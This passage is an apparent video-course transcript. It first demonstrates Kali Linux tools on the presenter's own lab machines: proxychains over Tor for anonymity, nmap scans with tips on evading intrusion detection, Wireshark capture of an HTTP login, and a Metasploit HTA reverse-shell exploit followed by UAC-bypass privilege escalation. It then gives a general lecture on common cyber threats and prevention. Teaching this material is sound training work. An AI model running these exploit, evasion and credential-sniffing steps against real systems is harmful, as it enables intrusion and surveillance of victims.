currently our pwd, which is the present working directory, is in the NF2 folder, as you can see over here. Let's copy the efile2 to the NF folder. We can write cp efile2 and give the path of the NF folder, which will be home, Simplilearn, desktop, and NF. Now if I press ls, I'll find both the files in NF2 since I copied. To go back to the NF folder again, we can again use the same command of we can again use the home, Simplilearn, desktop, and just NF. No NF2 this time, just NF. As you can see, this will change back our present working directory. Now when we press ls, we will find the efile2 file and the NF2 folder. And we can confirm this using the GUI as well. This is the NF folder, and you can see the NF2 folder and the efile2 document. If I write cat efile2, we can see the contents of the file. Now this can be done using moving as well. For example, if I go to cd nf2, which is the inside folder, it has both the document files like efile and efile2. Let's say I want to move the efile completely from nf2 to nf1. Instead of writing cp, the command I'm going to use is mv efile, and again give the path of the folder into which I have to copy, which will be again home, Simplilearn, desktop, and NF. As you can see, the contents of the NF2 have appeared here, and E file has been moved from NF2 to NF. This is the NF2, and we don't find E file here anymore. If we press cd ... and we go back to NF ls right now, and we can find both the files, E file that we moved and E file2 that we copied from the NF2 folder. So this is how copying and moving will work using the terminal. Now this is just a simple one-line statement that might take a couple of clicks when using GUI. This is why the command line interface is considered to be much more streamlined for Linux operating systems. Another very important command for Linux operating system is the sudo command. Sudo is short for super user do. The command enables you to perform tasks that require administrative or root permissions. You can think of it as how we run programs as administrator on Windows systems. It is not advisable to use this command for daily use because it might be easy for an error to occur, and the permissions of root are very intricate, so new beginners are advised to use the sudo command only when absolutely necessary. For example, sudo su. With this command, I am giving this terminal a root permission. This su stands for this user. At this point, it's going to ask for my admin password. Once I enter my password, and I now have root access. Note how the password that I entered did not show up here. This is a security measure to prevent people from snooping on your root password, which is the end game of all this operating system. As you also can see, the symbol changed. If the dollar symbol is showing, it shows as a standard user. When you switch to root, you can easily see a hash symbol. This opens up a separate shell inside this terminal command. For example, we can exit out of the root user to the standard user using the command exit. And once again, we have the dollar sign and the root has vanished over here. There are some commands that will only work with administrative access. For example, when updating the Kali Linux system, we have to use apt update. As you can see, it says problem unlinking the file because permission denied. Now let's try this using sudo apt update. As you can see, it is updating the package repositories which work as the software installed on the system. This can be done using either writing the sudo command every time we want to perform a root access, or we can just write sudo su once and write apt update alone. The fetching is complete over here. For the second example, let's say I just write sudo su, and this time it's not going to ask me the password because at this current terminal process, I've already provided the root password once and it is in memory right now. Now, when we used to update the system, we had to write sudo apt update. That was because we were running it as a standard user. Now we are running it as a root user. So all we have to write is apt update, and it's going to continue its work. There you go. Another command that can be useful is the ping command. It's pretty self-explanatory. It's going to be checking the internet connectivity. You can be used to check internet connectivity, or you can see if there is a local server on your system which needs to be pinged. Then you can check that. For example, if we have to write ping, and we can use either IP address or domain. Let's say if we want to check that if we can access google.com using this Kali Linux installation or not, we can write ping google.com, and you can see it shows the bytes being sent and received and how much time it took to take up the request. This can be done for local systems as well. For example, this installation of Kali Linux is being run on a virtual machine. Once this machine is running, I still have my host machine running over here, the IP address of which is 192.168.29.179. If I try to ping this from here, as you can see, the time to complete the request is drastically low compared to a website on the internet, considering this is on the local network. This is how the ping command is worked, and it can show you what kind of packages are transmitted, how many are received, if there was any kind of packet loss between the connection window, and other details. A very important command when working with the terminal for a long duration is the history command. Pretty self-explanatory. There are so many commands that are being run. Sometimes people forget what was the change they did or what was the directory name they put. A history command helps to recover some of the commands that you have written. It doesn't go all the way back, but it takes up many commands that were inputted in the last few processes. This is how the history command works. These are some of the most commonly used terminal commands. If you want to learn more about this terminal and every other feature of this, please let us know in the comment section, and we will try to make an in-depth tutorial, especially if you could repeat. If you want to learn more about the terminal, please let us know in the comment section, and we will try to make an in-depth tutorial specifically for terminal commands on Linux. Moving on, we learn how to configure proxy chains on our system. Proxying refers to the technique of bouncing your internet traffic through multiple machines to hide the identity of the original machine. It is a good tool that hackers use to accomplish this goal is proxy chains. Essentially, you can use proxy chains to run any program to a proxy server. This will allow you to access internet from behind a restrictive firewall which hides your IP address. Proxy chains even allows you to use multiple proxies at once by chaining them together. One of the most important reasons that proxy chains is used in a security context is that it's easy to evade detection. Attackers often use proxies to hide their true identities while executing an attack. And when multiple proxies are chained together, it becomes harder and harder for a forensic professional to trace the traffic back to the original machine. When these proxies are located across countries, investigators would have to obtain warranties in the local jurisdictions where every proxy is located. To see how proxy chain works, let's open Firefox first and check our current IP address. Write Firefox, and there we go. As we can see, Firefox is now open. Let's check our current IP address right now. If we go to an address called myip.com, and you can see it easily detects our country is in India, and this is a public IP address. Now, if we move to the terminal again, here we can now write proxy chains -h. What this -h does is it finds a help. It stands for the help file. This is for help file. What we found out using this is proxy chains has a config file here, etc proxychains4.conf. This is the config file found. Using this config file, we can customize how our proxy chain should work. If we want to open that, we have to use it in a text editor. On Windows, we have Notepad and other things like that, Microsoft Word to edit documents. On Linux, we have a tool called Nano. To access the Nano, we use the command nano and give the path of the file that we want to check. As of right now, the proxy chains config file is located over here. So we're going to follow the path there. chains4.conf. And here we go. We see the config file. There are three basic types of proxy chaining here. We have a strict chain where all the proxy in the list will be used and they will be chained in order. We have a random chain where each connection made through proxy chains will be done by a random combo of proxies in the proxy list. When you have dynamic chain, it's the same as strict chain, but dead proxies are excluded from the chain. And here we can set up whichever type we want. To enable or disable a particular type, we use the hash symbol here. As you can see right now, all the lines have a hashtag symbol at the front, except this one, a dynamic chain. This is the current one being used. Let's say if I want to use a strict chain method, so I can add a hash value here and remove the hash here. At one point of time, any one of these 3-4 types should be enabled. Let's go for the dynamic chain. We can disable this strict chain by putting the hashtag in front and removing the dynamic chain. As you can see below, we have few commands to how to handle the nano text editor. This symbol is known as the control button on your keyboard. Now if we want to write out, which is synonymous to saving the file, supposed to go with Control O. So if I press Control O on my keyboard, it says file name to write, and we have to press enter here since we want to overwrite the proxy chains 4.conf file. We don't want to create a new file over here. So just press enter and we get a permission denied. This permission denied we're getting is because we have opened this using a standard user. etc is a system folder. To be able to make some changes, we have to use it using a sudo command. To exit this nano, we have to use the Control X command. We use Control X. We're going to clear, and this time we're going to use the sudo command. Sudo nano etc proxy chains 4.conf, and we have the same file open up again. Now this time if we want to make a change, let's say we're going to add a strict chain instead of a dynamic chain, we remove the hashtag from strict. We're going to use Control O for the save file option. We're going to press enter and it says wrote 160 lines. Again, if you want to reverse this change, we put the hashtag over here, enable dynamic chain, we press Control O, press enter, and it says wrote 160 lines. Now we can exit straight away using the Control X format. Right now we have not provided any file or a proxy chain. We can have proxy IP addresses from the internet, but we have to make sure that they are safe and they don't snoop on our data. When there is no proxy chains being provided personally, it's going to use the Tor network, but for that we have to start Tor. Tor is a service in Linux. To know more about this Tor, we can write sudo systemctl, which is used to know the status of services on the Linux operating system, and status of Tor. Systemctl, sorry, instead of stl, it should be systemctl status Tor. As you can see, it is a Tor service, anonymizing overlay network for TCP connections, and it's currently inactive. Now to start this up, we have to write sudo systemctl start Tor. Now if we repeat the same sudo systemctl status Tor, as you can see, it's active now. You can see the green logo over here. Okay. To integrate the Firefox and the browser, we can use the proxy chains command directly over here. We can write proxy chains. We can use Firefox to launch our web browser, and let's say if we want to visit google.com. We press enter and the Firefox window is launched, and it should open up google.com next. And there we go. If we go to myip.com once again, as you can see, we have a different IP address and the country is unknown as well. So this is how we can use proxy chains to anonymize internet usage when using Kali Linux. Next on our agenda is the ability to scan networks using NMAP. At its core, NMAP is a network scanning tool that uses IP packets to identify all the devices connected to a network. You can learn more about NMAP using their help file. As you can see, these are some of the parameters that can be used when scanning ports of a system. You can see the version and the URL of the service over here. The primary uses of NMAP can be broken into three core processes. First, the program gives you detailed information on every IP active on your network, and then each IP can then be scanned. Secondly, it can also be used to providing a lot of live hosts and open ports, as well as identifying the OS of every connected device. Thirdly, NMAP has also become a valuable tool for users looking to protect personal and business websites. Using NMAP to scan your own web server, particularly if you're hosting your website from home, is essentially simulating the process that a hacker would use to attack your site. Attacking your own site in this way is a powerful way of identifying security vulnerabilities. As we already discussed, the host Windows 10 machine on this system has an IP address of 192.168.29.179. If you want to test the OS scan of this system, we're going to first get the root permission over here. We use the sudo command, and now we are a root user. We're going to launch the command nmap -o, which is supposed to be an OS detection scan. The IP address we can use of the host system 192.168.29.179. In a legitimate penetration testing scenario, we can use the IP address of the vulnerable device over here. We are going to let it scan for a while, and it's going to give us some guesses on what can the OS be. As you can see, the scan is done, and it has shown some of the ports that are open. You can see the MSRPC port open, the HTTPS 443 port open, which is used to connect to the internet, and it has some aggressive OS guesses as well. For example, it thinks there's a 94% chance that it's going to be a Microsoft Windows XP Service Pack 3. That's partly because a lot of the Windows XP update packages are still prevalent on Windows. Now that the OS detection is confirmed, there are multiple more details that we can gather from nmap. Let's go with the nmap -a command, which is supposed to capture as much data as possible. There is also a speed setting. You can call it a speed setting or a control setting of the -t. -t ranges from T0 to T1 to T2 all the way up to T5. This basically determines how aggressively the victim is being scanned. If you scan slowly, it will take more time to provide the results, but it will also give a less chance for the intrusion detection system on the vulnerable machine firewall to detect that someone is trying to penetrate the network. For now, if we want to go with somewhat of a high speed, we can go with the T4 and provide the same IP address of the local machine I am trying to attack. It's going to take a little bit of time since it's trying to capture a lot of information. As you can see, the results are now here. It launched a scan and took a few top ports that are most likely vulnerable from a Windows XP perspective, and it showed a few ports over here. It has not shown 991 filtered ports, which could not be attacked anyway since they were closed for outside access. It shows a few fingerprint settings like the connection policies and the port details. It shows an HTTP options, some other intricate details that can be used when you attacking its servers. It shows a VMware version that it's running and some few other ports over here. Apart from that, we also have the aggressive OS guesses over here, just like we did with the -o, and you can see this time it is showing Windows 7 as 98%. No exact OS matches, since if there was any exact OS matches, we could have seen 100% chances over here. This is a trace route. A trace route will be the time and the path a connection request takes from the source to the destination. For example, this request went from 192.168.72.2 to a destination address. Since this is a local machine, it took only a single step. On multiple occasions, if you're trying to access a remote system, it's going to be a number of trace routes when it jumps from firewall to firewall and router to router. This is how we can use NMAP to find information about a system and find some vulnerable ports we can access. Moving on, we have a tutorial on how to use Wireshark to sniff network traffic. To start using Wireshark, we're going to have to open the application first. Now, during installation of Wireshark, there is an option to enable if non-root users can be able to capture traffic or not. In my installation, I have disabled that, so I will be launching Wireshark when using the root user itself. Also, to capture data, we need an external Wi-Fi adapter. You can see it over here in the VM tab, Removable Devices, RE-Link 802.1 and WLAN. This is an external Wi-Fi adapter which is inserted into my USB system. You can see it over here. If I write iwconfig, this is the one, WLAN 0. This is absolutely necessary because we need to have a monitor mode required. We won't need it for sniffing data on Wireshark right now, but it's going to be necessary later on in this tutorial as well, as we will see. For now, we can just start up Wireshark by writing its name on the command line, and it should start the program. Here we go. Here it's going to check which of the adapters we want to use. For example, right now the ETH0, which is supposed to stand for Ethernet 0 port, you can see data is being transmitted up and down. We're going to select ETH0. And we have started capturing data. You can see the data request from the source to destination, from the time and which protocol it is following, everything we can see, and we can see the IPv4 flags here as well, as you can see over here. To capture internet traffic, we can try running Firefox. If we just write wikipedia.com, and you can see the number of requests increasing. Okay, this is a spelling mistake. Wikipedia. Here you can see the application data of all these requests going up, and they're connected to a destination server of 102.166.224. Now, even if we check the transmission control protocol flags over here and so many more things, we cannot find anything beneficial. As you can see, the information over here is gibberish, which is supposed to be, since it's supposed to be encrypted. Now, this is possible due to this being an HTTPS website. Hence, you can see the log symbol over here, and connection is supposed to be secure. Now, what about HTTP ports? We have seen many people recommend to not visit HTTP ports. Repeat. We have seen many people recommend to not visit HTTP websites, and even if we have to visit, to not provide any critical information. For example, let's go to a random HTTP page over here. As you can see, this is saying connection is not secure, and this is an HTTP page and not HTTPS. Now, let's check for some of the information that is passing through this. This is a login form. Let's say I have a legitimate account over here. If I write my account name, and my password is supposed to be password 1234. I press login, and the password does not match because I do not have an account over here. But let's say I did, and I was logged in as expected. We can go to Wireshark. We can use filters over here. Now, all the requests that I am sending, it's a TCP request. So I can write a filter containing TCP contains whatever string, if it is being passed. Let's say for the end username, I write my account name. So I can just write my account name over here and press enter to find a request over here. Now, as you can see, there are many flags over here. If we go to the HTML form URL encoded and open up some of its flags, as you can see, I can see my account name and Simplilearn password over here. This is the same details that I input on the website. Let's say I did have a legitimate account on this website. I would have logged in with no problems, but anyone who would be using Wireshark to sniff on the data can easily get my credentials from here. This is why it's recommended to not provide any information on HTTP pages. The security is not up to the mark, and always look for the lock symbol when visiting any website or making any internet transactions or providing any information. This is how we can use Wireshark to detect transmission and sniff packet data that is being transferred through the network adapter. Next, we have to learn about what is Metasploit. The Metasploit project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS development. We can open up the terminal here. We're going to allow root access, and to open up Metasploit, the keyword is MSF console. It's going to take a little bit of time to start it up. Now the Metasploit console has been loaded. From here, we can decide what type of attack we want to launch and what kind of exploits we can launch against vulnerable targets. For example, like we already discussed, I'm running this virtual machine on a Windows 10 host machine. So if I open the command prompt from my Windows 10 over here, if I need to check the IP address once, I go with ipconfig. Here you can see the IP address of this local machine. Moving on, if we have to attack that machine, let's say we want to see what kind of exploits are going to work over there. Now we already know that Windows has some common vulnerabilities. One of those vulnerabilities is the HTA server vulnerability. HTA is supposed to be a HTML application, but when passed the right payload, it can be used to open a backdoor into a system. To start off with the Metasploit and accessing such applications, we're going to use the command use exploit, and the name of the reverse HTA server is this: Windows MISC for miscellaneous HTA server. As you can see, it already found this one. Alright, now there are some options that we need to set for this exploit to go through. For example, you can see some of the options over here. There is the payload. The payload is supposed to be the malicious file that we are going to send on the HTML application, which allows us to give the backdoor. For example, right now the payload, which is the malicious file, is a Windows Meterpreter reverse TCP. Completely understandable. Now let's set the L host. L host and R host and SRV host should be the one where we are going to launch the attack from. For example, if we launched another tab of this console and we just press ifconfig, the IP address is 192.168.72.130. So we're going to set the L host as 192.168.72.130, and we're going to do the same thing with SRV host. We're going to set a port where we need to capture the backdoor access. Next, the payload has already been set. This payload will launch a backdoor and give us Meterpreter access to the system. Meterpreter can be considered as an upgrade of a normal command prompt shell. We will look into it once we get the access in the first place. Now that we have set the commands, we can press on exploit and press enter. Now, you can see we have a URL over here. We're going to copy this URL. Once the URL is copied, we take it into the browser and paste it. This will ask us to download this file. Now, as per browser security settings, this file should be blocked by default. We can decide to keep it, and with the correct formulation of this malicious package, even the website browser antivirus softwares will not be able to detect good payloads. We're going to save this file and we're going to open it. Publisher could not be verified. If we press run and we go back to our MetaPeta access over here, you can see it has already captured a URL of an HT server and it is writing delivering payload. Just have to wait for a few seconds till the payload is delivered. It has sent this much amount of data. MetaPeta session 1 is opened and we should get the access soon. There we go. Now, to understand where is the session set, we can write sessions -i. As you can see, it has a MetaPeta over here. We're going to write sessions -i. The session ID is 1, so we're going to write 1. And we have the MetaPeta access. Now, to get a fair idea of the system, we're going to write sysinfo, and it's going to the computer name, the OS, architecture, all these things. We can write the help command to see what are the things that we can get out of the system. We can take screenshots, we can control the webcam and start a video chat. We can take a lot of things over here. There are other commands as well where we can change the file directory, like the cat command, cd command. There are so many things that work in the normal CMD which we can run on the MetaPeta as well. Now, if you want to access this command prompt of the system directly, we can go with this. We have to write shell, and there we go. We are in the downloads folder right now. To see if this is the same computer or not, we're going to write ipconfig. As you can see, it is our victim machine with 192.168.29.171. We can just press exit and we're back with the MetaPeta access. This is how we can use MetaPeta and Metasploit to gain access to a Windows 10 machine. Next, let's take a look at how we can get root access from a Windows 10 system. We just learned how we can get a MetaPeta access from a system. We can background this MetaPeta session by writing background and pressing enter. We can still see the sessions -i. It's still present over here. Now, these kind of access are not administrative access. These are the kind of backdoors that can be created for standard users. But to get a complete access of a system, including the program files, the Windows documents, we need to have root access or administrative access. To do that, we're going to use another exploit. Reminder that the MetaPeta session of the standard access is already present and we're not messing with it right now. We're going to set up another session, albeit with the same machine. That exploit name is use exploit Windows local bypass UAC event viewer. And there we go. Now, if we check the options that we can put in the system, we have to choose an exploit target. We need to put a session as well. Let's say we're going to use the session 1. This is the session that has the MetaPeta access with the standard user. It doesn't have the system user. We're going to write set session 1 and we're going to run exploit. Run a few commands and it opened a second MetaPeta session. As you can see, it is the session 2. If I write sysinfo, you can still see I'm not the system user right now. I'm still just a normal user. How can we check that? If you go to shell, I can still see user Shinabi downloads, all these things. If I press exit, go back to the MetaPeta. There is a command on MetaPeta, get system. It attempts to elevate your privilege to that of the local system, which basically means you get promoted into root access. So if we write get system, and due to pipe impersonation, we now have the system root access. As you can see, now it has become x64 and we are the admin users. Now if I go to shell, I can easily go back, Windows, and I can easily access these things. This kind of control over the Windows folders and the program files folders, these kind of things are not possible if you are not an admin access or the command prompt has not been run with admin permissions. This is how we can use privilege escalation to get into an admin access system. We use the second exploit, which was the bypass US event viewer exploit, and essentially used it with the first session. As you can read here, Windows escalation USE protection bypass. It was first disclosed on 2016, but it still works on some systems. This is how we can get root access on a Windows 10 installation. Hope you learned something new today.
Let's have a look at today's agenda. We will start off with what is a cybersecurity threat, then move on to the different types of cyber threats faced in today's times, and finally end the session by understanding how we can prevent cyber attacks. Before I begin, let me talk about a few real-life scenarios. In 2018 and 2019, the famous American multinational coffee and donut company Dunkin' Donuts announced that it had been a victim of a cyber attack. It stated that it was a case of credential stuffing attack. In such an attack, users' credentials are stolen. In this case, hackers used user credentials leaked at other sites to gain entry to the Dunkin' Donuts Perks Rewards accounts. The type of information available inside such an account includes a user's first and last names, email address, a 16-digit DD Perks account number, and a DD Perks QR code. Here, the hackers targeted the account itself, which they could then sell on dark web forums. In order to prevent such attacks in the future, Dunkin' Donuts asked its customers to set unique passwords that are not repeated. That was all about the cyber attack Dunkin' Donuts witnessed. Just like how the COVID-19 situation is affecting various domains, it is also adversely affecting cybersecurity. Interpol states that attackers are attacking computer networks and systems of businesses, individuals, and big global organizations. Due to the shift of focus to the COVID crisis, cybersecurity is taking a huge brunt. Even WHO has stated that from the beginning of this pandemic, it has witnessed a sky-high increase in the number of cyber attacks. There are fake emails doing the rounds in which scammers are impersonating WHO. Reports also state that the financial services sector is increasingly being targeted during the COVID-19 coronavirus pandemic. Various banks and financial institutions have witnessed a spike in the number of cyber attacks in the last few months. Several banks are increasing cyber attack awareness amongst their customers and also asking them not to disclose any confidential information to a third party. Now that we have an idea as to how cyber attacks can affect us, let's go ahead and understand the meaning of a cyber threat. A cyber threat is a warning which allows you to prepare against a cyber attack. When there is an unauthorized access by a third party to your system and network, it is termed as a cyber attack. The person who carries this out is termed as a hacker or an attacker or a cyber criminal. A possibility of such an attack is termed as a cyber threat. As we saw previously, cyber attacks lead to data breaches which result in either data manipulation or loss of highly confidential data. It also results in financial losses, and which in turn has a colossal impact on the businesses. In addition to these losses, a lot of companies face reputational damages as well. Trust plays a vital role when it comes to customer relationships. Cyber attacks can hamper an organization's reputation and erode the customer's trust. Let's now get an understanding of the most common cyber attacks. Here, we will look into the top 10 cyber threats in today's times. First up, we have the malware attack. This is a very common form of cyber attack. The term malware refers to malicious software, virus, including spyware, worms, ransomware, adware, and trojans. Trojan virus is a form of malware that disguises itself as a legitimate software. Ransomware blocks access to the key components of the network, whereas spyware, as the name suggests, is a software that steals your confidential data without your knowledge. Coming to adware, it is also a software, but this software displays advertising content such as banners or pop-ups on a user screen. Malware breaches a network through a vulnerability. It usually happens when the victim clicks a dangerous link or downloads an email attachment, or also when an infected pen drive is used. Let's now have a look at the ways in which we can prevent a malware attack. First and foremost, you should use any kind of an antivirus software. This step might be something that you have heard time and again, but it is a very effective way to prevent a malware attack. Antivirus software is a program that can protect your computer against the above-mentioned viruses. This data security utility installed in a computer can prevent a malware attack. Few of the popular antivirus software are Avast Antivirus, Norton Antivirus, and McAfee Antivirus. Secondly, you should use firewalls. A firewall helps prevent an unauthorized access, viruses, and other malicious activities that occur over the internet. As the name suggests, it acts as a wall between your system and the internet. It filters the traffic that is allowed to enter your device. Windows and Mac OS X have their default built-in firewalls named as Windows Firewall and Mac Firewall respectively. Apart from this, in order to prevent attacks on your network, your router should also have a firewall built in. Thirdly, you should always stay alert and avoid clicking on suspicious links. The links might look to be legitimate, but they can be home to malware which is going to enter your system and cause a havoc. Lastly, it is wise to update operating systems and browsers regularly. If this is not done, cybercriminals can exploit these vulnerabilities and attack your system. That was all about preventing a malware attack. Let's move on to the next attack. It is the phishing attack. It is one of the biggest widespread types of cyber attacks. As per reports, phishing accounts for over $12 billion in business losses. So what is a phishing attack? It is an attack wherein an attacker impersonates to be a trusted contact and sends the victim fake emails. Unaware of this, the victim opens the email and clicks on the malicious link or opens the attachment in the mail. The aim of such an attack is to gain access to confidential information and account credentials. Hackers can also install malware through a phishing attack. This attack is growing bigger each day as attackers are becoming more convincing in pretending to be a trusted source. For example, you might get an email from Apple stating that your Apple account is kept on hold for security reasons, and the mail will ask you to type in your login credentials in order to restore your account. Do not fall for that, as it is a phishing email. Legitimate sources will not randomly send you mails and ask for your account credentials. Phishing is a type of social engineering attack. Social engineering attacks refer to several malicious activities that are obtained through human interactions. It manipulates the victim in such a way that he or she ends up divulging personal information. Such an attack can happen on any platform such as text messages or even on social media sites. Similar to phishing, you also have voice phishing known as wishing. Wishing will be carried out over a voice email or mobile phone or even over landlines. So how do we prevent a phishing attack? Human error is the reason for a high percentage of cyber attacks. To prevent a phishing attack, the wisest way will be to scrutinize the emails you receive. A phishing email will have some spelling mistakes or a format change from that of the legitimate source it is pretending to come from. Look for these loopholes and do not click any such suspicious emails. Next, you can also make use of an anti-phishing toolbar. Sometimes when it is impossible to identify a phishing email, this toolbar is helpful. It is a tool that provides you with anti-phishing solutions and information about the website you are browsing. They prevent fraudulent websites from masquerading as other legitimate websites. For example, Avast Online Security is a good anti-phishing toolbar you can get. You should also make it a habit to update your passwords regularly. This way, even if your own password is known to a third party, it will still be invalid. Let's now move on to the next type of cyber attack, that is the password attack. This is a form of attack most of us might have experienced at some point in time. Imagine when you try to log into an account and it says incorrect password. In such a scenario, it is possible that an outsider has managed to either guess or steal your password. By doing so, all your data is compromised. A hacker can crack your password with the help of various programs and password cracking tools like AirCrack, Kane-Enable, John the Ripper, Hashcat, and so on. There are different types of password attacks. A brute force attack happens when the hacker tries to log in with all possible password combinations. Meanwhile, in the dictionary attack, a list of common passwords is used to crack the user's login credentials. Next is a keylogger attack. Keystroke logging records the keys struck on a keyboard by the victim, and the victim is totally ignorant of this. This keylogger or a keystroke recorder can either be a hardware or a software. Speaking of how one can prevent password attacks, it is crucial that you use alphanumeric passwords which are strong. Incorporate special characters in your passwords as well. It is to be noted that you shouldn't be using the same password for multiple websites or accounts. Also, make sure to not use easily guessable passwords, which includes your name or your family members' names or even your date of birth. Needless to say, update your passwords regularly. This will limit your exposure to a password attack. The next tip is something we should all be careful about. Often we make complicated passwords, and to remember them, we note it down somewhere or keep some sort of a password hint in the open. This shouldn't be done in the open, as this can prove to be a gateway to an attack, as a third party can misuse your account with the help of your password hint. Let's now move on and have a look at the fourth type of cyber attack on our list, that is the man-in-the-middle attack. As you can see on your screens, we have the client on the left, the server on the right, and the hacker below. And now you can see that the client-server communication has been cut off, and instead the communication line now goes through the hacker. So let's elaborate on this. Man-in-the-middle attack is also known as eavesdropping attack. It takes place when an attacker comes in between a two-party communication. In other words, the attacker hijacks the session between a client and host. So what do they gain by interrupting the session? Well, they are able to steal and also filter data. Imagine you are logging into your bank account. In such a state, a man-in-the-middle attack can be used to obtain information related to your bank account. Let's now have a look at how we can prevent man-in-the-middle attack. Firstly, you should be aware of the security of the website you are using, and it is advised to use encryption on all devices that contain crucial data. Using an unsecure public Wi-Fi can help attackers carry out the man-in-the-middle attack. Hence, it is suggested that you avoid using public Wi-Fis to carry out important work. Next attack that we will be talking about is the SQL injection attack. A structured query language, SQL injection, occurs in a database-driven website when the hacker manipulates a standard SQL query. This attack can be carried out by submitting a malicious code into a vulnerable website search box, thereby making the server reveal information. The outcome of this attack is that the attacker is able to view, edit, and delete tables in the databases. In addition to this, the attackers can also obtain administrative rights. An SQL attack manipulates data and accesses confidential information. In order to prevent a SQL injection attack, you should use an intrusion detection system. An IDS is designed to detect unauthorized access to a system. It is used together with a firewall and a router. This way, unwanted requests can be filtered out. The next step is to carry out a validation of the user-supplied data. There are codes that are developed to identify illegal user inputs. The validation process helps in verifying whether or not the type of user input is allowed or not. This way, only that value which passes the validation will be processed. That was all about the SQL injection attack. So now that we have reached midway, I'd like to remind you all to feel free to leave your questions in our chat section and we will be happy to answer them. Without further ado, let's go back to our list of the top cybersecurity threats. At number 6, we have the denial of service attack. This is a type of attack that proves to be a major threat to companies. In this attack, malicious parties target systems, servers, or networks and then flood them with traffic so as to exhaust their resources and bandwidth. As a result, the server is unable to handle incoming requests and thereby resulting in the website it hosts to either slow down or shut down. This leaves legitimate service requests unattended. It is known as distributed denial of service, DDoS, when attackers use multiple compromised systems to launch this attack. Like I mentioned earlier, the DDoS attack is a major threat to organizations. Let's have a look at one such DDoS attack. In February 2018, the famous United States-based global company GitHub revealed that it was hit with the distributed denial of service attack, DDoS attack. This DDoS attack is considered to be the world's largest DDoS attack. As you might be aware, GitHub is a developer platform used by millions all over the world. Hence, it always has high traffic and usage. But this time, it wasn't just high traffic, but a whopping 1.35 terabits per second, sending packets at a rate of 126.9 million per second. These figures speak for itself. Fortunately, GitHub was running a DDoS protection service which was automatically alerted within 10 minutes of the start of the attack. This attack only took GitHub systems down for about 15 to 20 minutes. GitHub was able to stop the attack quickly only because it utilized a DDoS mitigation service that helped in detecting the attack and which further helped in quickly taking the necessary steps to minimize the impact. Let's now have a look at how to prevent a DDoS attack. Firstly, to stop a DDoS attack, you're required to identify the malicious traffic. This can be made possible by running a traffic analysis. Also, remember to comprehend the warning signs. Few symptoms of a DDoS attack include network slowdown, intermittent website shutdowns, etc. If anything seems irregular and unusual, then the organization should do the needful. Secondly, understand that every organization can face a DDoS attack and be ready with a prevention plan, as there won't be any time to prepare one when it hits. For this purpose, develop an incident response plan, have a checklist, and make sure your team and data center is prepared. If you are well prepared, you can tackle a DDoS attack smoothly like how GitHub did. Lastly, the conventional DDoS mitigation solutions oversize the network bandwidth and require complex hardware, which proves to be costly and also ineffective. Whereas cloud has greater bandwidth and resources. It is also to be noted that cloud-based apps can absorb malicious traffic way before it reaches its intended destination. Hence, it is good to outsource DDoS prevention to cloud-based service providers. That was all about the DDoS attack. Now, let's look at number 7, and here we have the insider threat. An insider threat, as the name suggests, is one that does not involve a third party but an insider. It could be someone from the organization who knows everything about the organization. It could be current employees, former employees, contractors, or these threats have the potential to cause huge damages. Researchers show that insider threats are growing in small businesses as employees have access to multiple accounts that have a lot of data. The individuals who misuse this data can put everyone else at risk. Reasons for such security breaches are many. It can be due to malice, greed, or even carelessness. Such a threat is quite tricky as these attacks are hard to predict. In order to prevent the insider threat attack, thorough preparation is required. Organizations should make sure that they have a good culture of security awareness. Businesses can limit the IT resources a user can have access to depending on their job roles. This way, the damage, if caused, can be minimized. All the employees should be trained to identify insider threats, and this way, employees can understand when an attacker has manipulated or is attempting to misuse the company data. Next up in our list is cryptojacking, which is at number 8. I'm sure most of you are aware of the word cryptocurrency. Cryptojacking is related to cryptocurrency. You must be wondering how. Let's understand what is cryptojacking. Cryptojacking takes place when attackers make their way into someone else's computer to mine cryptocurrency. This is done by infecting a website or by manipulating the victim to click on a malicious link, which in turn loads crypto mining code on the computer. It is also done through online ads with JavaScript code that will auto-execute once loaded in the victim's browser. Victims are unaware of this as the crypto mining code works in the background. The only sign they might witness is a delay in the execution. Crypto mining is a form of obtaining cryptocurrency. Crypto mining by itself is an immense process. That is the reason attackers make use of other computers in order to crypto mine. Let's have a look at ways to prevent cryptojacking. It is advised that you keep all security apps and software updated to the latest versions, as cryptojacking can infect the most unprotected systems. It is also good to have a cryptojacking awareness training and give tips to employees as to how to detect cryptojacking threats. Make sure to inform them about the risks of opening emails from unknown senders and clicking on attachments. Ads are a primary source of cryptojacking scripts. Therefore, it's good to install an ad blocker and also have extensions like MinerBlock, which is used to detect and block crypto mining scripts. Moving on to the number 9 on our list, we have the zero-day exploit. A zero-day exploit occurs after the announcement of a network vulnerability. Usually, the vendor becomes aware of a vulnerability, but a solution to it is still not available for the same. Hence, the vendor announces the vulnerability so that the users are aware of it, but this also makes the attackers aware of it. The vendor or the developer could take any amount of time to find a solution. It could vary from a few hours to days to months, depending on the vulnerability. In the meantime, the attackers target the disclosed vulnerability. They exploit the vulnerability even before a patch or a solution is implemented. Speaking of ways to prevent zero-day exploit, organizations should have a well-communicated patch management process. It is also crucial to use management solutions to automate the procedures. Thus, it avoids delays in deployment. Having an incident response plan helps in dealing with a cyber attack. You need to have a plan primarily looking into zero-day attacks. In case of an attack, this plan will keep you prepared and will allow you to avoid or reduce the damage. Finally, at number 10, we have the watering hole attack. Generally, in a watering hole attack, the victim is of a specific group. It could be either victims of an organization or a region or so on. Here, the attacker targets the websites which are frequently used by the particular group. They identify these websites either by guesswork or by closely monitoring the group. After which, the attackers infect a few of these websites with malware, and anyone who happens to visit the infected website will have their computers automatically loaded with malware. This attack loads the victim's system with malware similar to the phishing attack. The malware in such an attack targets personal information of the victim. There is also a possibility that the hacker will actively take control of the infected computer. Let's have a look at how we can prevent the watering hole attack. Just like most other cyber attack prevention methods, in this attack as well, it is strongly suggested that you regularly update your software. By doing so, you can reduce the risk of this attack, as this attack most often exploits vulnerabilities. Also, make sure to regularly check for any security patches. Make use of your network security tools to detect watering hole attacks. Intrusion prevention systems work finely when it comes to detecting a suspicious act. Similarly, you can conduct regular security checks using various network security tools. To prevent a watering hole attack, it is good to conceal your online activities. This can be done with the help of a VPN and also through your browser's private browsing feature. A virtual private network, often called a VPN, provides a secure connection to another network over the internet. It acts as a cover to your browsing activity. NordVPN is an example of a VPN that can be used to provide a secure connection. So those were all about the different types of cyber threats. Cybersecurity is implemented in order to put a curb on these cyber attacks. Cybersecurity refers to the practice of protecting networks, computer systems, and their components from unauthorized digital access. According to the Gartner forecast worldwide, it is stated that the worldwide spending on cybersecurity is forecasted to reach $133.7 billion in 2022. And according to the University of Maryland, hackers attack every 39 seconds, that is, on an average, 2,244 times a day. Although we had a look at multiple 